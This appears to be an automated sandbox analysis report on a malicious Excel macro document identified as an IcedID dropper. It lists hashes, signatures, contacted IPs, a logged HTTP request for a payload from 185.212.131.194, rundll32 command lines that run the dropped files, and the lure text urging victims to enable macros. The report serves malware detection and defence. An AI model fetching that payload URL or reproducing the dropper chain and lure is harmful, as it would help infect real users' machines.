Loading ...

Play interactive tourEdit tour

Analysis Report Contract_132508562.xlsm

Overview

General Information

Sample Name:Contract_132508562.xlsm
Analysis ID:382682
MD5:4acf095722b577ef282e9b2b736de65d
SHA1:fbb4e8aee2d48443cd9ee930fc79891edc88edaa
SHA256:8815a2be7dfd8565affb9271d229aab6289a97a96de5428c966fad85c6141e68
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1888 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2924 cmdline: rundll32 ..\Hodas.vyur,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2456 cmdline: rundll32 ..\Hodas.vyur1,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2852 cmdline: rundll32 ..\Hodas.vyur2,PluginInit MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: http://185.212.131.194/44285,5327891204.datVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: Contract_132508562.xlsmReversingLabs: Detection: 17%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.212.131.194:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 83.136.232.110:80
Source: Joe Sandbox ViewIP Address: 83.136.232.110 83.136.232.110
Source: Joe Sandbox ViewIP Address: 190.14.37.247 190.14.37.247
Source: Joe Sandbox ViewIP Address: 185.212.131.194 185.212.131.194
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.212.131.194Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 83.136.232.110
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.247
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: unknownTCP traffic detected without corresponding DNS query: 185.212.131.194
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78389088.gifJump to behavior
Source: global trafficHTTP traffic detected: GET /44285,5327891204.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.212.131.194Connection: Keep-Alive
Source: rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: Contract_132508562.xlsmInitial sample: URLDownloadToFileA
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar ab' r,,dll Once you have enabled editing, please click
Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
Source: Screenshot number: 8Screenshot OCR: Enable editing button from the yellow bar above 15 0 Once you have enabled editing, please click En
Source: Screenshot number: 8Screenshot OCR: Enable Content button from the yellow bar above 16 17 18 19 20 21 22 ' 23 24 25 26 27 2
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Contract_132508562.xlsmInitial sample: EXEC
Source: Contract_132508562.xlsmInitial sample: EXEC
Source: Contract_132508562.xlsmInitial sample: EXEC
Source: Contract_132508562.xlsmOLE, VBA macro line: Private Sub Auto_Open()
Source: Contract_132508562.xlsmOLE indicator, VBA macros: true
Source: rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal84.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Contract_132508562.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB95F.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: Contract_132508562.xlsmReversingLabs: Detection: 17%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur1,PluginInit
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\Hodas.vyur2,PluginInit
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Contract_132508562.xlsmInitial sample: OLE zip file path = xl/media/image1.gif
Source: Contract_132508562.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Contract_132508562.xlsm17%ReversingLabsDocument-Office.Trojan.IcedID

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://185.212.131.194/44285,5327891204.dat7%VirustotalBrowse
http://185.212.131.194/44285,5327891204.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.212.131.194/44285,5327891204.dattrue
  • 7%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000004.00000002.2272492166.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269613655.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263636610.0000000001CA7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000004.00000002.2272156457.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2269450808.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2263398796.0000000001AC0000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              83.136.232.110
              unknownRussian Federation
              31326MTR-SVIAZ-ASRUfalse
              190.14.37.247
              unknownPanama
              52469OffshoreRacksSAPAfalse
              185.212.131.194
              unknownGermany
              200313INTERNET-ITNLfalse

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:382682
              Start date:06.04.2021
              Start time:14:09:12
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 48s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Contract_132508562.xlsm
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Run name:Without Instrumentation
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal84.expl.evad.winXLSM@7/7@0/3
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsm
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe, svchost.exe

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              83.136.232.110Contract_657752239.xlsmGet hashmaliciousBrowse
              • 83.136.232.110/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 83.136.232.110/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 83.136.232.110/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 83.136.232.110/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 83.136.232.110/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 83.136.232.110/44285,5327891204.dat
              190.14.37.247Contract_657752239.xlsmGet hashmaliciousBrowse
              • 190.14.37.247/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 190.14.37.247/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 190.14.37.247/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 190.14.37.247/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 190.14.37.247/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 190.14.37.247/44285,5327891204.dat
              185.212.131.194Contract_132508562.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_132508562.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 185.212.131.194/44285,5327891204.dat

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              OffshoreRacksSAPAContract_132508562.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_132508562.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 190.14.37.247
              11CONFIDENTIAL APPROVED ACCOUNTS.exeGet hashmaliciousBrowse
              • 181.174.166.240
              61REQUEST FOR QUOTATION.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              6P.O 3500046.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              4711150874.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              57New Order.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              4610798560.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              3206589117.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              38179851662.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              26PO140855DW.docGet hashmaliciousBrowse
              • 181.174.166.168
              47407895069.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              43Amendment for attached P.O quanties.exeGet hashmaliciousBrowse
              • 181.174.166.240
              30610750398.DOCGet hashmaliciousBrowse
              • 181.174.166.168
              INTERNET-ITNLContract_132508562.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_132508562.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 185.212.131.194
              Closure TP-Stamp.htmGet hashmaliciousBrowse
              • 185.212.131.109
              audio.htmGet hashmaliciousBrowse
              • 45.88.3.244
              AxR7BY4wzz.exeGet hashmaliciousBrowse
              • 185.212.128.49
              SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
              • 185.212.128.49
              #Ud83d#Udcde Ensono.com AudioMessage_63-19716.htmGet hashmaliciousBrowse
              • 45.88.3.239
              #Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htmGet hashmaliciousBrowse
              • 45.88.3.239
              255423.jhertlein.255423.htmGet hashmaliciousBrowse
              • 45.133.203.92
              JAN Purchase Order.xlsxGet hashmaliciousBrowse
              • 185.212.128.102
              CMA 20210901-77886000988799908770998778.xlsxGet hashmaliciousBrowse
              • 185.212.128.102
              SecuriteInfo.com.Trojan.Siggen6.55368.3108.exeGet hashmaliciousBrowse
              • 185.212.128.102
              cpvAcIX9M6.exeGet hashmaliciousBrowse
              • 185.212.128.102
              7de1ZSY0nI.exeGet hashmaliciousBrowse
              • 185.212.128.102
              MTR-SVIAZ-ASRUContract_132508562.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_132508562.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_657752239.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 83.136.232.110
              Contract_1836733707.xlsmGet hashmaliciousBrowse
              • 83.136.232.110

              JA3 Fingerprints

              No context

